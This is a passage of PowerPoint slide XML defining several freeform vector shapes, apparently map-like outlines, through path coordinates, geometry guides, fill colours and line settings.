                      <a:pt x="76" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="3"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36428" name="Freeform 160"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879" y="2908"/>
                <a:ext cx="90" cy="98"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 90"/>
                  <a:gd name="T1" fmla="*/ 0 h 98"/>
                  <a:gd name="T2" fmla="*/ 57 w 90"/>
                  <a:gd name="T3" fmla="*/ 1 h 98"/>
                  <a:gd name="T4" fmla="*/ 71 w 90"/>
                  <a:gd name="T5" fmla="*/ 2 h 98"/>
                  <a:gd name="T6" fmla="*/ 67 w 90"/>
                  <a:gd name="T7" fmla="*/ 10 h 98"/>
                  <a:gd name="T8" fmla="*/ 69 w 90"/>
                  <a:gd name="T9" fmla="*/ 17 h 98"/>
                  <a:gd name="T10" fmla="*/ 79 w 90"/>
                  <a:gd name="T11" fmla="*/ 14 h 98"/>
                  <a:gd name="T12" fmla="*/ 86 w 90"/>
                  <a:gd name="T13" fmla="*/ 17 h 98"/>
                  <a:gd name="T14" fmla="*/ 88 w 90"/>
                  <a:gd name="T15" fmla="*/ 26 h 98"/>
                  <a:gd name="T16" fmla="*/ 80 w 90"/>
                  <a:gd name="T17" fmla="*/ 32 h 98"/>
                  <a:gd name="T18" fmla="*/ 79 w 90"/>
                  <a:gd name="T19" fmla="*/ 36 h 98"/>
                  <a:gd name="T20" fmla="*/ 80 w 90"/>
                  <a:gd name="T21" fmla="*/ 40 h 98"/>
                  <a:gd name="T22" fmla="*/ 85 w 90"/>
                  <a:gd name="T23" fmla="*/ 43 h 98"/>
                  <a:gd name="T24" fmla="*/ 89 w 90"/>
                  <a:gd name="T25" fmla="*/ 45 h 98"/>
                  <a:gd name="T26" fmla="*/ 88 w 90"/>
                  <a:gd name="T27" fmla="*/ 55 h 98"/>
                  <a:gd name="T28" fmla="*/ 86 w 90"/>
                  <a:gd name="T29" fmla="*/ 71 h 98"/>
                  <a:gd name="T30" fmla="*/ 83 w 90"/>
                  <a:gd name="T31" fmla="*/ 77 h 98"/>
                  <a:gd name="T32" fmla="*/ 79 w 90"/>
                  <a:gd name="T33" fmla="*/ 76 h 98"/>
                  <a:gd name="T34" fmla="*/ 76 w 90"/>
                  <a:gd name="T35" fmla="*/ 70 h 98"/>
                  <a:gd name="T36" fmla="*/ 72 w 90"/>
                  <a:gd name="T37" fmla="*/ 75 h 98"/>
                  <a:gd name="T38" fmla="*/ 67 w 90"/>
                  <a:gd name="T39" fmla="*/ 74 h 98"/>
                  <a:gd name="T40" fmla="*/ 62 w 90"/>
                  <a:gd name="T41" fmla="*/ 66 h 98"/>
                  <a:gd name="T42" fmla="*/ 59 w 90"/>
                  <a:gd name="T43" fmla="*/ 66 h 98"/>
                  <a:gd name="T44" fmla="*/ 57 w 90"/>
                  <a:gd name="T45" fmla="*/ 73 h 98"/>
                  <a:gd name="T46" fmla="*/ 51 w 90"/>
                  <a:gd name="T47" fmla="*/ 76 h 98"/>
                  <a:gd name="T48" fmla="*/ 44 w 90"/>
                  <a:gd name="T49" fmla="*/ 78 h 98"/>
                  <a:gd name="T50" fmla="*/ 44 w 90"/>
                  <a:gd name="T51" fmla="*/ 84 h 98"/>
                  <a:gd name="T52" fmla="*/ 49 w 90"/>
                  <a:gd name="T53" fmla="*/ 89 h 98"/>
                  <a:gd name="T54" fmla="*/ 47 w 90"/>
                  <a:gd name="T55" fmla="*/ 96 h 98"/>
                  <a:gd name="T56" fmla="*/ 38 w 90"/>
                  <a:gd name="T57" fmla="*/ 96 h 98"/>
                  <a:gd name="T58" fmla="*/ 37 w 90"/>
                  <a:gd name="T59" fmla="*/ 98 h 98"/>
                  <a:gd name="T60" fmla="*/ 29 w 90"/>
                  <a:gd name="T61" fmla="*/ 90 h 98"/>
                  <a:gd name="T62" fmla="*/ 17 w 90"/>
                  <a:gd name="T63" fmla="*/ 79 h 98"/>
                  <a:gd name="T64" fmla="*/ 17 w 90"/>
                  <a:gd name="T65" fmla="*/ 74 h 98"/>
                  <a:gd name="T66" fmla="*/ 7 w 90"/>
                  <a:gd name="T67" fmla="*/ 64 h 98"/>
                  <a:gd name="T68" fmla="*/ 10 w 90"/>
                  <a:gd name="T69" fmla="*/ 61 h 98"/>
                  <a:gd name="T70" fmla="*/ 5 w 90"/>
                  <a:gd name="T71" fmla="*/ 57 h 98"/>
                  <a:gd name="T72" fmla="*/ 0 w 90"/>
                  <a:gd name="T73" fmla="*/ 50 h 98"/>
                  <a:gd name="T74" fmla="*/ 6 w 90"/>
                  <a:gd name="T75" fmla="*/ 46 h 98"/>
                  <a:gd name="T76" fmla="*/ 10 w 90"/>
                  <a:gd name="T77" fmla="*/ 36 h 98"/>
                  <a:gd name="T78" fmla="*/ 13 w 90"/>
                  <a:gd name="T79" fmla="*/ 34 h 98"/>
                  <a:gd name="T80" fmla="*/ 16 w 90"/>
                  <a:gd name="T81" fmla="*/ 33 h 98"/>
                  <a:gd name="T82" fmla="*/ 8 w 90"/>
                  <a:gd name="T83" fmla="*/ 27 h 98"/>
                  <a:gd name="T84" fmla="*/ 12 w 90"/>
                  <a:gd name="T85" fmla="*/ 26 h 98"/>
                  <a:gd name="T86" fmla="*/ 19 w 90"/>
                  <a:gd name="T87" fmla="*/ 21 h 98"/>
                  <a:gd name="T88" fmla="*/ 34 w 90"/>
                  <a:gd name="T89" fmla="*/ 21 h 98"/>
                  <a:gd name="T90" fmla="*/ 39 w 90"/>
                  <a:gd name="T91" fmla="*/ 20 h 98"/>
                  <a:gd name="T92" fmla="*/ 38 w 90"/>
                  <a:gd name="T93" fmla="*/ 3 h 98"/>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90"/>
                  <a:gd name="T142" fmla="*/ 0 h 98"/>
                  <a:gd name="T143" fmla="*/ 90 w 90"/>
                  <a:gd name="T144" fmla="*/ 98 h 98"/>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90" h="98">
                    <a:moveTo>
                      <a:pt x="38" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="39" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="3"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36429" name="Freeform 161"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3281" y="2387"/>
                <a:ext cx="25" cy="69"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12 w 25"/>
                  <a:gd name="T1" fmla="*/ 69 h 69"/>
                  <a:gd name="T2" fmla="*/ 7 w 25"/>
                  <a:gd name="T3" fmla="*/ 54 h 69"/>
                  <a:gd name="T4" fmla="*/ 1 w 25"/>
                  <a:gd name="T5" fmla="*/ 38 h 69"/>
                  <a:gd name="T6" fmla="*/ 0 w 25"/>
                  <a:gd name="T7" fmla="*/ 36 h 69"/>
                  <a:gd name="T8" fmla="*/ 1 w 25"/>
                  <a:gd name="T9" fmla="*/ 35 h 69"/>
                  <a:gd name="T10" fmla="*/ 6 w 25"/>
                  <a:gd name="T11" fmla="*/ 28 h 69"/>
                  <a:gd name="T12" fmla="*/ 7 w 25"/>
                  <a:gd name="T13" fmla="*/ 25 h 69"/>
                  <a:gd name="T14" fmla="*/ 8 w 25"/>
                  <a:gd name="T15" fmla="*/ 20 h 69"/>
                  <a:gd name="T16" fmla="*/ 10 w 25"/>
                  <a:gd name="T17" fmla="*/ 16 h 69"/>
                  <a:gd name="T18" fmla="*/ 11 w 25"/>
                  <a:gd name="T19" fmla="*/ 9 h 69"/>
                  <a:gd name="T20" fmla="*/ 12 w 25"/>
                  <a:gd name="T21" fmla="*/ 9 h 69"/>
                  <a:gd name="T22" fmla="*/ 13 w 25"/>
                  <a:gd name="T23" fmla="*/ 8 h 69"/>
                  <a:gd name="T24" fmla="*/ 13 w 25"/>
                  <a:gd name="T25" fmla="*/ 6 h 69"/>
                  <a:gd name="T26" fmla="*/ 13 w 25"/>
                  <a:gd name="T27" fmla="*/ 4 h 69"/>
                  <a:gd name="T28" fmla="*/ 16 w 25"/>
                  <a:gd name="T29" fmla="*/ 3 h 69"/>
                  <a:gd name="T30" fmla="*/ 17 w 25"/>
                  <a:gd name="T31" fmla="*/ 3 h 69"/>
                  <a:gd name="T32" fmla="*/ 17 w 25"/>
                  <a:gd name="T33" fmla="*/ 4 h 69"/>
                  <a:gd name="T34" fmla="*/ 20 w 25"/>
                  <a:gd name="T35" fmla="*/ 4 h 69"/>
                  <a:gd name="T36" fmla="*/ 20 w 25"/>
                  <a:gd name="T37" fmla="*/ 2 h 69"/>
                  <a:gd name="T38" fmla="*/ 20 w 25"/>
                  <a:gd name="T39" fmla="*/ 0 h 69"/>
                  <a:gd name="T40" fmla="*/ 21 w 25"/>
                  <a:gd name="T41" fmla="*/ 0 h 69"/>
                  <a:gd name="T42" fmla="*/ 21 w 25"/>
                  <a:gd name="T43" fmla="*/ 0 h 69"/>
                  <a:gd name="T44" fmla="*/ 23 w 25"/>
                  <a:gd name="T45" fmla="*/ 3 h 69"/>
                  <a:gd name="T46" fmla="*/ 24 w 25"/>
                  <a:gd name="T47" fmla="*/ 4 h 69"/>
                  <a:gd name="T48" fmla="*/ 24 w 25"/>
                  <a:gd name="T49" fmla="*/ 6 h 69"/>
                  <a:gd name="T50" fmla="*/ 24 w 25"/>
                  <a:gd name="T51" fmla="*/ 7 h 69"/>
                  <a:gd name="T52" fmla="*/ 25 w 25"/>
                  <a:gd name="T53" fmla="*/ 8 h 69"/>
                  <a:gd name="T54" fmla="*/ 24 w 25"/>
                  <a:gd name="T55" fmla="*/ 8 h 69"/>
                  <a:gd name="T56" fmla="*/ 24 w 25"/>
                  <a:gd name="T57" fmla="*/ 9 h 69"/>
                  <a:gd name="T58" fmla="*/ 24 w 25"/>
                  <a:gd name="T59" fmla="*/ 13 h 69"/>
                  <a:gd name="T60" fmla="*/ 24 w 25"/>
                  <a:gd name="T61" fmla="*/ 15 h 69"/>
                  <a:gd name="T62" fmla="*/ 23 w 25"/>
                  <a:gd name="T63" fmla="*/ 17 h 69"/>
                  <a:gd name="T64" fmla="*/ 23 w 25"/>
                  <a:gd name="T65" fmla="*/ 24 h 69"/>
                  <a:gd name="T66" fmla="*/ 23 w 25"/>
                  <a:gd name="T67" fmla="*/ 30 h 69"/>
                  <a:gd name="T68" fmla="*/ 22 w 25"/>
                  <a:gd name="T69" fmla="*/ 32 h 69"/>
                  <a:gd name="T70" fmla="*/ 22 w 25"/>
                  <a:gd name="T71" fmla="*/ 36 h 69"/>
                  <a:gd name="T72" fmla="*/ 20 w 25"/>
                  <a:gd name="T73" fmla="*/ 43 h 69"/>
                  <a:gd name="T74" fmla="*/ 16 w 25"/>
                  <a:gd name="T75" fmla="*/ 52 h 69"/>
                  <a:gd name="T76" fmla="*/ 16 w 25"/>
                  <a:gd name="T77" fmla="*/ 59 h 69"/>
                  <a:gd name="T78" fmla="*/ 14 w 25"/>
                  <a:gd name="T79" fmla="*/ 66 h 69"/>
                  <a:gd name="T80" fmla="*/ 13 w 25"/>
                  <a:gd name="T81" fmla="*/ 68 h 69"/>
                  <a:gd name="T82" fmla="*/ 13 w 25"/>
                  <a:gd name="T83" fmla="*/ 68 h 69"/>
                  <a:gd name="T84" fmla="*/ 12 w 25"/>
                  <a:gd name="T85" fmla="*/ 69 h 69"/>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25"/>
                  <a:gd name="T130" fmla="*/ 0 h 69"/>
                  <a:gd name="T131" fmla="*/ 25 w 25"/>
                  <a:gd name="T132" fmla="*/ 69 h 69"/>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25" h="69">
                    <a:moveTo>
                      <a:pt x="12" y="69"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="69"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36430" name="Freeform 162"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3281" y="2387"/>
                <a:ext cx="25" cy="69"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12 w 25"/>
                  <a:gd name="T1" fmla="*/ 69 h 69"/>
                  <a:gd name="T2" fmla="*/ 7 w 25"/>
                  <a:gd name="T3" fmla="*/ 54 h 69"/>
                  <a:gd name="T4" fmla="*/ 1 w 25"/>
                  <a:gd name="T5" fmla="*/ 38 h 69"/>
                  <a:gd name="T6" fmla="*/ 0 w 25"/>
                  <a:gd name="T7" fmla="*/ 36 h 69"/>
                  <a:gd name="T8" fmla="*/ 1 w 25"/>
                  <a:gd name="T9" fmla="*/ 35 h 69"/>
                  <a:gd name="T10" fmla="*/ 6 w 25"/>
                  <a:gd name="T11" fmla="*/ 28 h 69"/>
                  <a:gd name="T12" fmla="*/ 7 w 25"/>
                  <a:gd name="T13" fmla="*/ 25 h 69"/>
                  <a:gd name="T14" fmla="*/ 8 w 25"/>
                  <a:gd name="T15" fmla="*/ 20 h 69"/>
                  <a:gd name="T16" fmla="*/ 10 w 25"/>
                  <a:gd name="T17" fmla="*/ 16 h 69"/>
                  <a:gd name="T18" fmla="*/ 11 w 25"/>
                  <a:gd name="T19" fmla="*/ 9 h 69"/>
